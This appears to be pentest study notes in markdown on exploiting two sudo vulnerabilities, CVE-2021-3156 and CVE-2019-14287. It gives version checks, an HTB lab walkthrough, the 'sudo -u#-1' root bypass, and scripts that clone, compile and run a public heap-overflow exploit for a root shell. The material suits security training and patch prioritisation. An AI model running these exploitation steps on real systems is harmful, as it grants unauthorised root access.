Skip to content

Latest commit

 

History

History
247 lines (195 loc) · 5.97 KB

sudo-cve-exploits.md

File metadata and controls

247 lines (195 loc) · 5.97 KB

🚨 Sudo CVE Exploits

🎯 Overview

Known sudo vulnerabilities provide direct privilege escalation through heap buffer overflow (Baron Samedit) and policy bypass exploits affecting specific sudo versions.

🔥 CVE-2021-3156 (Baron Samedit)

Vulnerability Details

  • Impact: Heap-based buffer overflow → root shell
  • Affected Versions:
    • 1.8.31 (Ubuntu 20.04)
    • 1.8.27 (Debian 10)
    • 1.9.2 (Fedora 33)
  • Existed: Over 10 years undetected

Version Check

# Check sudo version
sudo -V | head -n1
# Sudo version 1.8.31

# Check OS version
cat /etc/lsb-release
# DISTRIB_RELEASE=20.04

Exploitation

# 1. Download Baron Samedit exploit
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

# 2. Compile exploit
make

# 3. Check available targets
./sudo-hax-me-a-sandwich
# 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
# 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
# 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

# 4. Execute with target ID
./sudo-hax-me-a-sandwich 1  # For Ubuntu 20.04
# Result: root shell

🔓 CVE-2019-14287 (Sudo Policy Bypass)

Vulnerability Details

  • Impact: User ID bypass → privilege escalation
  • Affected: All versions below 1.8.28
  • Method: Negative user ID (-1) processed as UID 0 (root)

Prerequisites

# Need sudo access to any command
sudo -l
# User may run: (ALL) /usr/bin/id

Exploitation

# Check user ID
cat /etc/passwd | grep $(whoami)
# user:x:1005:1005:user,,,:/home/user:/bin/bash

# Execute with negative ID
sudo -u#-1 id
# uid=0(root) gid=1005(user) groups=1005(user)

# Get full root shell
sudo -u#-1 /bin/bash

HTB Academy Lab Example (CVE-2019-14287)

# 1. Connect to target
ssh htb-student@target

# 2. Check sudo permissions
bash -i
sudo -l
# User htb-student may run the following commands:
#     (ALL, !root) /bin/ncdu

# 3. Check ncdu manual for exploitation
man -P cat ncdu | grep -A 5 "b   Spawn shell"
# Option 'b' spawns shell in current directory

# 4. Execute with negative user ID
sudo -u#-1 /bin/ncdu
# Press 'b' in ncdu interface

# 5. Get root shell and read flag
id  # uid=0(root)
cat /root/flag.txt

🔍 Version Enumeration

Sudo Version Check

# Basic version check
sudo -V | head -n1

# Detailed version info
sudo -V | grep -E "(version|release)"

# Check for specific vulnerable versions
sudo -V | grep -E "(1\.8\.(31|27|21)|1\.9\.2)"

OS Version Correlation

# Ubuntu version
cat /etc/lsb-release
lsb_release -a

# Debian version
cat /etc/debian_version

# Generic OS info
cat /etc/os-release

🚀 Quick Exploitation

CVE-2021-3156 Quick Check

#!/bin/bash
version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
if echo "$version" | grep -qE "(1\.8\.(31|27|21)|1\.9\.[0-2])"; then
    echo "[!] VULNERABLE to CVE-2021-3156: $version"
    echo "Download: https://github.com/blasty/CVE-2021-3156.git"
fi

CVE-2019-14287 Quick Check

#!/bin/bash
version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
if sudo -l >/dev/null 2>&1; then
    if echo "$version" | grep -qE "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])"; then
        echo "[!] VULNERABLE to CVE-2019-14287: $version"
        echo "Exploit: sudo -u#-1 /bin/bash"
    fi
fi

🔧 Exploitation Scripts

Baron Samedit Automation

#!/bin/bash
echo "=== CVE-2021-3156 BARON SAMEDIT CHECK ==="

version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
echo "Sudo version: $version"

if echo "$version" | grep -qE "(1\.8\.(31|27|21)|1\.9\.[0-2])"; then
    echo "[!] VULNERABLE to CVE-2021-3156"
    
    if [ ! -d "CVE-2021-3156" ]; then
        echo "[+] Downloading exploit..."
        git clone https://github.com/blasty/CVE-2021-3156.git
        cd CVE-2021-3156 && make
    fi
    
    echo "[+] Available exploit targets:"
    ./CVE-2021-3156/sudo-hax-me-a-sandwich 2>/dev/null || echo "Compile first with 'make'"
else
    echo "[-] Not vulnerable to CVE-2021-3156"
fi

Policy Bypass Test

#!/bin/bash
echo "=== CVE-2019-14287 POLICY BYPASS CHECK ==="

if sudo -l >/dev/null 2>&1; then
    echo "[+] Sudo access available"
    version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
    
    if echo "$version" | grep -qE "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])"; then
        echo "[!] VULNERABLE to CVE-2019-14287: $version"
        echo "[+] Testing exploit:"
        echo "sudo -u#-1 id"
    else
        echo "[-] Not vulnerable to CVE-2019-14287"
    fi
else
    echo "[-] No sudo access"
fi

🔑 Quick Reference

Immediate Checks

# Version vulnerability check
sudo -V | grep -E "(1\.8\.(31|27|21)|1\.9\.[0-2])"  # CVE-2021-3156
sudo -V | grep -E "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])"  # CVE-2019-14287

# Sudo access check
sudo -l

Emergency Exploitation

# CVE-2019-14287 (if vulnerable version + sudo access)
sudo -u#-1 /bin/bash

# CVE-2021-3156 (if vulnerable version)
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156 && make
./sudo-hax-me-a-sandwich 1  # Ubuntu 20.04

Alternative Exploits

# Other CVE-2021-3156 exploits
# https://github.com/worawit/CVE-2021-3156
# https://github.com/stong/CVE-2021-3156

# Automated exploitation tools
# https://github.com/lockedbyte/CVE-Exploits

⚠️ Exploit Considerations

CVE-2021-3156 Notes

  • Compilation required on target or similar system
  • OS-specific targets - must match exact version
  • Heap manipulation - may cause crashes if wrong target
  • Success varies based on system configuration

CVE-2019-14287 Notes

  • Simple exploitation - one command
  • Requires sudo access to any command
  • Limited impact - only vulnerable versions
  • Well-patched in modern systems

Sudo CVE exploits provide direct privilege escalation for specific vulnerable versions - Baron Samedit and Policy Bypass represent critical sudo vulnerabilities requiring immediate patching.